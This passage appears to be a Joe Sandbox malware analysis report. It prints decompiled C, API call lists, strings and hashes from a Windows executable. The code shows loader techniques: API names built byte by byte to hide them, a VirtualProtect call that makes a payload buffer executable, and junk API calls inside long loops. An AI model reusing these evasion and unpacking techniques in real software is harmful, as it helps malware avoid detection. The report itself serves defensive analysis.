                    					FormatMessageA(0, 0, 0, 0,  &_v1416, 0, 0);
                    					__imp__CreateActCtxW( &_v100);
                    					_push(0);
                    					VerifyVersionInfoW( &_v392, 0, 0);
                    					InterlockedIncrement( &_v24);
                    					InterlockedIncrement( &(_v32.dwHighDateTime));
                    					GetCommandLineA();
                    					_v8 = 0;
                    					asm("stosw");
                    					_v12 = 0;
                    					asm("stosw");
                    					WriteConsoleOutputW(0,  &(_v20.dwHighDateTime), _v8, _v12,  &_v44);
                    					GetBinaryTypeA(0,  &_v36);
                    					GetCommandLineA();
                    				}
                    				if( *0x57a190 == 0x1d) {
                    					WriteConsoleW(0, 0, 0,  &_v36, 0);
                    					lstrcpynW( &_v5204, 0, 0);
                    					CopyFileA(0, 0, 0);
                    					LoadLibraryA(0);
                    					__imp__MoveFileWithProgressA(0, 0, 0, 0, 0);
                    					_v64.Internal = 0;
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					PostQueuedCompletionStatus(0, 0, 0,  &_v64);
                    					GetCPInfo(0, 0);
                    					InterlockedDecrement( &_v24);
                    					GetPrivateProfileStructA(0, 0,  &_v1416, 0, 0);
                    					__imp__DeleteVolumeMountPointA(0);
                    					__imp__GetVolumeNameForVolumeMountPointA(0, 0, 0);
                    					__imp__GetConsoleAliasesLengthW(0);
                    					GetFileTime(0,  &_v20,  &_v32,  &_v44);
                    					GetStringTypeW(0, 0, 0, 0);
                    				}
                    				L00403397();
                    				return 0;
                    				L8:
                    				_t146 = _t146 + 1;
                    				if(_t146 < 0x91be26a3) {
                    					goto L1;
                    				}
                    				goto L9;
                    			}




































                    0x004034aa
                    0x004034b2
                    0x004034bc
                    0x00000000
                    0x004034be
                    0x004034c4
                    0x004034c8
                    0x004034cf
                    0x004034cf
                    0x004034dc
                    0x004034eb
                    0x004034eb
                    0x004034f7
                    0x00000000
                    0x00000000
                    0x00403514
                    0x00403514
                    0x00403516
                    0x0040351c
                    0x00403523
                    0x00403523
                    0x00403530
                    0x00403537
                    0x00403537
                    0x0040353d
                    0x0040353e
                    0x0040354d
                    0x00403553
                    0x00403559
                    0x0040355b
                    0x00403560
                    0x00403566
                    0x00403568
                    0x00403569
                    0x00403575
                    0x0040357d
                    0x00403598
                    0x004035a2
                    0x004035a2
                    0x004035a8
                    0x004035a9
                    0x004035a9
                    0x00403568
                    0x004035b7
                    0x004035be
                    0x004035c5
                    0x004035ce
                    0x004035d9
                    0x004035e0
                    0x004035fd
                    0x00403604
                    0x0040360c
                    0x00403619
                    0x00403622
                    0x00403629
                    0x00403632
                    0x00403644
                    0x00403655
                    0x0040365f
                    0x0040366e
                    0x00403671
                    0x00403671
                    0x00403673
                    0x00403673
                    0x00403673
                    0x0040367c
                    0x0040367f
                    0x00403684
                    0x0040368b
                    0x0040368e
                    0x0040368e
                    0x0040369b
                    0x004036a4
                    0x004036a4
                    0x004036a9
                    0x004036ac
                    0x004036bc
                    0x004036c8
                    0x004036cd
                    0x004036cf
                    0x004036d2
                    0x004036d4
                    0x004036d4
                    0x004036d9
                    0x004036da
                    0x004036f3
                    0x004036f8
                    0x004036fa
                    0x00403701
                    0x00403704
                    0x00403704
                    0x00403710
                    0x00403712
                    0x00403712
                    0x00403717
                    0x00403718
                    0x00403720
                    0x0040372f
                    0x0040373a
                    0x0040374d
                    0x00403757
                    0x0040375d
                    0x00403767
                    0x00403777
                    0x0040377d
                    0x0040377f
                    0x00403787
                    0x0040378e
                    0x00403790
                    0x00403797
                    0x004037a8
                    0x004037b3
                    0x004037b9
                    0x004037b9
                    0x004037c6
                    0x004037d4
                    0x004037e3
                    0x004037ec
                    0x004037f3
                    0x004037fe
                    0x00403806
                    0x0040380c
                    0x0040380d
                    0x0040380e
                    0x0040380f
                    0x00403817
                    0x0040381f
                    0x00403829
                    0x0040383a
                    0x0040383d
                    0x00403846
                    0x0040384d
                    0x00403860
                    0x0040386a
                    0x0040386a
                    0x00403870
                    0x0040387b
                    0x0040350b
                    0x0040350b
                    0x00403512
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • CharUpperBuffW.USER32(00000000,00000000), ref: 004034C8
                    • SetLastError.KERNEL32(00000000), ref: 004034CF
                    • WinHttpCreateUrl.WINHTTP(00000000,00000000,?,?), ref: 004034EB
                    • QueryMemoryResourceNotification.KERNEL32(00000000,?), ref: 00403537
                    • LocalAlloc.KERNELBASE(00000000), ref: 0040354D
                    • RegisterWaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040357D
                    • GetNamedPipeHandleStateW.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00403598
                    • InterlockedDecrement.KERNEL32(?), ref: 004035A2
                    • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 004035CE
                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004035D9
                    • DeleteFiber.KERNEL32(00000000), ref: 004035E0
                    • GetPrivateProfileStructA.KERNEL32 ref: 004035FD
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00403604
                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 0040360C
                    • RtlCaptureContext.KERNEL32(?), ref: 00403619
                    • FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 00403622
                    • LocalSize.KERNEL32 ref: 00403629
                    • OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 00403632
                    • GetStringTypeExA.KERNEL32(00000000,00000000,Dopayenecavet,00000000,?), ref: 00403644
                    • GetComputerNameA.KERNEL32 ref: 00403655
                    • LeaveCriticalSection.KERNEL32(?), ref: 0040365F
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,00000000,00000000), ref: 00403671
                    • LoadLibraryA.KERNEL32(00000000), ref: 0040368E
                    • GetModuleHandleA.KERNEL32(msimg32.dll), ref: 0040369E
                    • GetProcAddress.KERNEL32(msimg32.dll), ref: 004036C2
                    • InterlockedDecrement.KERNEL32(00000000), ref: 00403704
                    • GetModuleHandleW.KERNEL32(tizep), ref: 0040373A
                    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040374D
                    • CreateActCtxW.KERNEL32(?), ref: 00403757
                    • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 00403767
                    • InterlockedIncrement.KERNEL32(?), ref: 00403777
                    • InterlockedIncrement.KERNEL32(?), ref: 0040377D
                    • GetCommandLineA.KERNEL32 ref: 0040377F
                    • WriteConsoleOutputW.KERNEL32(00000000,?,001756BB,?,?), ref: 004037A8
                    • GetBinaryTypeA.KERNEL32(00000000,?), ref: 004037B3
                    • GetCommandLineA.KERNEL32 ref: 004037B9
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004037D4
                    • lstrcpynW.KERNEL32(?,00000000,00000000), ref: 004037E3
                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004037EC
                    • LoadLibraryA.KERNEL32(00000000), ref: 004037F3
                    • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037FE
                    • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?), ref: 00403817
                    • GetCPInfo.KERNEL32(00000000,00000000), ref: 0040381F
                    • InterlockedDecrement.KERNEL32(?), ref: 00403829
                    • GetPrivateProfileStructA.KERNEL32 ref: 0040383A
                    • DeleteVolumeMountPointA.KERNEL32 ref: 0040383D
                    • GetVolumeNameForVolumeMountPointA.KERNEL32(00000000,00000000,00000000), ref: 00403846
                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 0040384D
                    • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00403860
                    • GetStringTypeW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040386A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: Interlocked$ConsoleDecrementFileHandleTypeVolume$CommandCreateCriticalDeleteExchangeIncrementInfoLibraryLineLoadLocalModuleMountNameObjectPointPrivateProfileRegisterResourceSectionSingleStringStructWaitWrite$AddressAliasesAllocBinaryBuffCaptureCharCompletionComputerContextCopyCountDateEnumErrorFiberFindFormatFormatsHttpInitializeLastLeaveLengthMemoryMessageMoveMutexNamedNotificationOpenOutputPipePostProcProgressQueryQueuedSizeSpinStateStatusTimeUpperVerifyVersionWithlstrcpyn
                    • String ID: Dopayenecavet$gosizepeyabuxijavusadiculihazasa$msimg32.dll$mupexabetor$sijewenudapegiginotolut$tizep$NhvPhv
                    • API String ID: 1422112594-1817133863
                    • Opcode ID: 61620e7252f3a42bfd68b3c5f7988256414f4d1ce1b1f806e1bf8ae284955ebd
                    • Instruction ID: 233c2ec5048e7ba02c5e8a1465d959c430b2f9b943e3d2f1860d67d85045e0a7
                    • Opcode Fuzzy Hash: 61620e7252f3a42bfd68b3c5f7988256414f4d1ce1b1f806e1bf8ae284955ebd
                    • Instruction Fuzzy Hash: 19B1EDB2800148BFDB119BA0ED88DAF7B7CFB48345B404476F646F2561D7389E859B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 57 4033a9-4034a8 LoadLibraryA VirtualProtect
                    C-Code - Quality: 100%
                    			E004033A9(void* __eax, void* __ecx) {
                    				long _v8;
                    				struct HINSTANCE__* _t4;
                    				int _t6;
                    				CHAR* _t10;
                    
                    				_t10 = "msimg32.dll";
                    				 *0x4205ce = 0x33;
                    				 *0x4205cf = 0x32;
                    				 *0x4205d3 = 0x6c;
                    				M004205CB = 0x6e;
                    				"msimg32.dll" = 0x6b;
                    				M004205CC = 0x65;
                    				"32.dll" = 0x6c;
                    				"simg32.dll" = 0x65;
                    				M004205CA = 0x72;
                    				 *0x4205d0 = 0x2e;
                    				 *0x4205d1 = 0x64;
                    				 *0x4205d2 = 0x6c;
                    				 *0x4205d4 = 0;
                    				_t4 = LoadLibraryA(_t10);
                    				 *0x57860c = _t4;
                    				 *0x4205d3 = 0x65;
                    				"simg32.dll" = 0x69;
                    				M004205CC = 0x75;
                    				 *0x4205ce = 0x6c;
                    				"32.dll" = 0x61;
                    				 *0x4205d1 = 0x6f;
                    				 *0x4205d5 = 0x74;
                    				"msimg32.dll" = 0x56;
                    				 *0x4205d4 = 0x63;
                    				 *0x4205cf = 0x50;
                    				 *0x4205d6 = 0;
                    				M004205CB = 0x74;
                    				 *0x4205d2 = 0x74;
                    				M004205CA = 0x72;
                    				 *0x4205d0 = 0x72;
                    				"`ghvmsimg32.dll" = GetProcAddress(_t4, _t10);
                    				_t6 = VirtualProtect( *0x574b0c,  *0x57a190, 0x40,  &_v8); // executed
                    				return _t6;
                    			}







                    0x004033b0
                    0x004033b6
                    0x004033bd
                    0x004033c4
                    0x004033cb
                    0x004033d2
                    0x004033d9
                    0x004033e0
                    0x004033e7
                    0x004033ee
                    0x004033f5
                    0x004033fc
                    0x00403403
                    0x0040340a
                    0x00403411
                    0x00403419
                    0x0040341e
                    0x00403425
                    0x0040342c
                    0x00403433
                    0x0040343a
                    0x00403441
                    0x00403448
                    0x0040344f
                    0x00403456
                    0x0040345d
                    0x00403464
                    0x0040346b
                    0x00403472
                    0x00403479
                    0x00403480
                    0x00403499
                    0x004034a4
                    0x004034a8

                    APIs
                    • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00403411
                    • GetProcAddress.KERNEL32(00000000,msimg32.dll), ref: 00403487
                    • VirtualProtect.KERNELBASE(00000040,?), ref: 004034A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProcProtectVirtual
                    • String ID: msimg32.dll$NhvPhv
                    • API String ID: 3509694964-2647807948
                    • Opcode ID: e840132f2f56fdc199d5d7430dc8ee0da973de19c2dc364205b69c030a012b5b
                    • Instruction ID: 74fd791a24f9d11ace7b6cd8026ad375d7b5e4068001da387876ea6cbc3f6525
                    • Opcode Fuzzy Hash: e840132f2f56fdc199d5d7430dc8ee0da973de19c2dc364205b69c030a012b5b
                    • Instruction Fuzzy Hash: DE2166106092C0FDE722C728AD487523FD56B22749F8800A9D1849A2B3C7FA11DADF7E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E0040387C() {
                    				long _v8;
                    				char _v32;
                    				void* __ebp;
                    				intOrPtr _t3;
                    				void* _t18;
                    
                    				_t22 =  *0x57a190 - 3;
                    				if( *0x57a190 == 3) {
                    					E00404A17(0);
                    					E004049E4(0, 0);
                    					_t17 =  &_v32;
                    					E004040CD( &_v32, _t22);
                    					if( *0x57a190 == 0x22) {
                    						SetConsoleMode(0, 0);
                    					}
                    					E0040494F();
                    				}
                    				_t3 =  *0x4105a4; // 0xb9c2
                    				 *0x57a190 = _t3;
                    				_t18 = 0;
                    				do {
                    					if( *0x57a190 == 0x15) {
                    						SetFilePointer(0, 0,  &_v8, 0);
                    						HeapWalk(0, 0);
                    						GetMailslotInfo(0, 0, 0, 0, 0);
                    						GetProcessPriorityBoost(0, 0);
                    					}
                    					if(_t18 == 0x1737) {
                    						 *0x57a194 =  *0x40f008;
                    					}
                    					_t18 = _t18 + 1;
                    				} while (_t18 < 0x79a863);
                    				E004034AA(_t17); // executed
                    				return 0;
                    			}








                    0x00403885
                    0x0040388d
                    0x00403890
                    0x00403897
                    0x0040389f
                    0x004038a2
                    0x004038ae
                    0x004038b2
                    0x004038b2
                    0x004038b8
                    0x004038b8
                    0x004038bd
                    0x004038c2
                    0x004038c7
                    0x004038c9
                    0x004038d0
                    0x004038d9
                    0x004038e1
                    0x004038ec
                    0x004038f4
                    0x004038f4
                    0x00403900
                    0x00403907
                    0x00403907
                    0x0040390c
                    0x0040390d
                    0x00403915
                    0x0040391f

                    APIs
                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 004038B2
                    • SetFilePointer.KERNEL32(00000000,00000000,?,00000000), ref: 004038D9
                    • HeapWalk.KERNEL32(00000000,00000000), ref: 004038E1
                    • GetMailslotInfo.KERNEL32 ref: 004038EC
                    • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 004038F4
                      • Part of subcall function 00404A17: DeleteFileA.KERNEL32(?,?,00403895,00000000), ref: 00404A1F
                      • Part of subcall function 00404A17: GetLastError.KERNEL32(?,00403895,00000000), ref: 00404A29
                      • Part of subcall function 00404A17: __dosmaperr.LIBCMT ref: 00404A38
                      • Part of subcall function 004049E4: MoveFileA.KERNEL32 ref: 004049EF
                      • Part of subcall function 004049E4: GetLastError.KERNEL32(?,0040389C,00000000,00000000,00000000), ref: 004049F9
                      • Part of subcall function 004049E4: __dosmaperr.LIBCMT ref: 00404A08
                      • Part of subcall function 004040CD: __EH_prolog.LIBCMT ref: 004040D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: File$ErrorLast__dosmaperr$BoostConsoleDeleteH_prologHeapInfoMailslotModeMovePointerPriorityProcessWalk
                    • String ID:
                    • API String ID: 3148135725-0
                    • Opcode ID: 6dcbad6e7ced8ac36e6e022139d35636d820cc8c03cfcba4c7b5cbf26eff43f6
                    • Instruction ID: 04d5e15dd3d9b2bb7f4cc4c6b014d932c798737e1a238aae43ef0ed5359413fc
                    • Opcode Fuzzy Hash: 6dcbad6e7ced8ac36e6e022139d35636d820cc8c03cfcba4c7b5cbf26eff43f6
                    • Instruction Fuzzy Hash: 4C016572401550AAD312BF61FD0AC9F3F6CEF92315B00413AF549B1561D7380685EAAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 82 402ff7-403056 LoadLibraryA
                    C-Code - Quality: 100%
                    			E00402FF7() {
                    				struct HINSTANCE__* _t1;
                    
                    				"msimg32.dll" = 0x6d;
                    				"simg32.dll" = 0x73;
                    				"32.dll" = 0x33;
                    				 *0x4205d3 = 0;
                    				M004205CC = 0x67;
                    				 *0x4205d0 = 0x64;
                    				M004205CB = 0x6d;
                    				 *0x4205d1 = 0x6c;
                    				 *0x4205cf = 0x2e;
                    				 *0x4205d2 = 0x6c;
                    				 *0x4205ce = 0x32;
                    				M004205CA = 0x69; // executed
                    				_t1 = LoadLibraryA("msimg32.dll"); // executed
                    				return _t1;
                    			}




                    0x00402ffc
                    0x00403003
                    0x0040300a
                    0x00403011
                    0x00403018
                    0x0040301f
                    0x00403026
                    0x0040302d
                    0x00403034
                    0x0040303b
                    0x00403042
                    0x00403049
                    0x00403050
                    0x00403056

                    APIs
                    • LoadLibraryA.KERNELBASE(msimg32.dll,00403725), ref: 00403050
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: msimg32.dll
                    • API String ID: 1029625771-3287713914
                    • Opcode ID: 1e62f176a67440fca8e3326165de175ac583bfac569920d5ff573f4913e73816
                    • Instruction ID: c3ca48617d25acd17f977b8f17b6631fcbeda749841bf92432e9428ad5d66121
                    • Opcode Fuzzy Hash: 1e62f176a67440fca8e3326165de175ac583bfac569920d5ff573f4913e73816
                    • Instruction Fuzzy Hash: 10F0C81074D2C0E9E762C328A95C7113ED52B22748FD844AAD1805A6A7C6FB01EACF7E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 96 407eb2-407ed4 HeapCreate 97 407ed6-407ed7 96->97 98 407ed8-407ee1 96->98
                    C-Code - Quality: 100%
                    			E00407EB2(intOrPtr _a4) {
                    				void* _t6;
                    
                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                    				 *0x57a634 = _t6;
                    				if(_t6 != 0) {
                    					 *0x57ac58 = 1;
                    					return 1;
                    				} else {
                    					return _t6;
                    				}
                    			}




                    0x00407ec7
                    0x00407ecd
                    0x00407ed4
                    0x00407edb
                    0x00407ee1
                    0x00407ed7
                    0x00407ed7
                    0x00407ed7

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00407EC7
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: dab3f9df0873dbb66d59a1ffd7a7cdb8e3d00ab1e86608c3963ad7d201bd37d4
                    • Instruction ID: 7889757c789c7da0a890e7b76dcd0c4e6123f9f17385902fb7df80ec0326ffa1
                    • Opcode Fuzzy Hash: dab3f9df0873dbb66d59a1ffd7a7cdb8e3d00ab1e86608c3963ad7d201bd37d4
                    • Instruction Fuzzy Hash: D5D05E36994349AADB015F75BD08B263BDC9398396F148436B90CC6290E574D980A645
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 99 406805-406807 call 406793 101 40680c-40680d 99->101
                    C-Code - Quality: 100%
                    			E00406805() {
                    				void* _t1;
                    
                    				_t1 = E00406793(0); // executed
                    				return _t1;
                    			}




                    0x00406807
                    0x0040680d

                    APIs
                    • __encode_pointer.LIBCMT ref: 00406807
                      • Part of subcall function 00406793: TlsGetValue.KERNEL32(00000000,?,0040680C,00000000,0040A2DB,0057A210,00000000,00000314,?,00407573,0057A210,Microsoft Visual C++ Runtime Library,00012010), ref: 004067A5
                      • Part of subcall function 00406793: TlsGetValue.KERNEL32(00000004,?,0040680C,00000000,0040A2DB,0057A210,00000000,00000314,?,00407573,0057A210,Microsoft Visual C++ Runtime Library,00012010), ref: 004067BC
                      • Part of subcall function 00406793: RtlEncodePointer.NTDLL(00000000,?,0040680C,00000000,0040A2DB,0057A210,00000000,00000314,?,00407573,0057A210,Microsoft Visual C++ Runtime Library,00012010), ref: 004067FA
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: Value$EncodePointer__encode_pointer
                    • String ID:
                    • API String ID: 2585649348-0
                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                    • Instruction ID: f33416d72701d6d2040f3587bf452106a3c5ced27a51013427c5c41c92882c51
                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 8ecb69-8ecba3 call 8ece7c 105 8ecba5-8ecbd8 VirtualAlloc call 8ecbf6 102->105 106 8ecbf1 102->106 108 8ecbdd-8ecbef 105->108 106->106 108->106
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008ECBBA
                    Memory Dump Source
                    • Source File: 00000000.00000002.306092360.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E8000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_8e8000_b8E3zd5AYc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 4ce9e1e039ad0ca897a2f236866c792906e56cb6e2728719a9a091832f2d38ed
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: FE115B79A00248EFCB01DF98C985E88BBF5EF09350F058094F948AB362D331EA90DB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00403304(intOrPtr _a4) {
                    				short _v8;
                    				short _v12;
                    				struct _FILETIME _v20;
                    				struct _OSVERSIONINFOEXW _v304;
                    				short _v2352;
                    				intOrPtr _t10;
                    				intOrPtr _t22;
                    				void* _t25;
                    
                    				if( *0x57a190 == 0x37) {
                    					__imp__GetComputerNameExW(0, 0, 0, _t25);
                    					FindResourceA(0, "Piwatolavibo tetez fey zel fiviyisutocup", "Jakoduhepu lotosaxufedox");
                    					IsBadWritePtr(0, 0);
                    					GlobalGetAtomNameW(0,  &_v2352, 0);
                    					DebugBreak();
                    					FileTimeToDosDateTime( &_v20,  &_v12,  &_v8);
                    					LocalSize(0);
                    					_push(0);
                    					VerifyVersionInfoW( &_v304, 0, 0);
                    				}
                    				_t10 = _a4;
                    				_t22 =  *0x57a194; // 0x40ccda
                    				_t8 = _t10 + 0x38d6; // 0x74c4491a
                    				 *((char*)( *0x574b0c + _t10)) =  *((intOrPtr*)(_t22 + _t8));
                    				return _t10;
                    			}











                    0x00403314
                    0x0040331c
                    0x0040332d
                    0x00403335
                    0x00403344
                    0x0040334a
                    0x0040335c
                    0x00403363
                    0x00403369
                    0x00403373
                    0x00403379
                    0x0040337a
                    0x0040337d
                    0x00403383
                    0x00403390
                    0x00403394

                    APIs
                    • GetComputerNameExW.KERNEL32(00000000,00000000,00000000), ref: 0040331C
                    • FindResourceA.KERNEL32(00000000,Piwatolavibo tetez fey zel fiviyisutocup,Jakoduhepu lotosaxufedox), ref: 0040332D
                    • IsBadWritePtr.KERNEL32(00000000,00000000), ref: 00403335
                    • GlobalGetAtomNameW.KERNEL32 ref: 00403344
                    • DebugBreak.KERNEL32 ref: 0040334A
                    • FileTimeToDosDateTime.KERNEL32 ref: 0040335C
                    • LocalSize.KERNEL32 ref: 00403363
                    • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 00403373
                    Strings
                    • Jakoduhepu lotosaxufedox, xrefs: 00403322
                    • Piwatolavibo tetez fey zel fiviyisutocup, xrefs: 00403327
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: NameTime$AtomBreakComputerDateDebugFileFindGlobalInfoLocalResourceSizeVerifyVersionWrite
                    • String ID: Jakoduhepu lotosaxufedox$Piwatolavibo tetez fey zel fiviyisutocup
                    • API String ID: 913479139-732877841
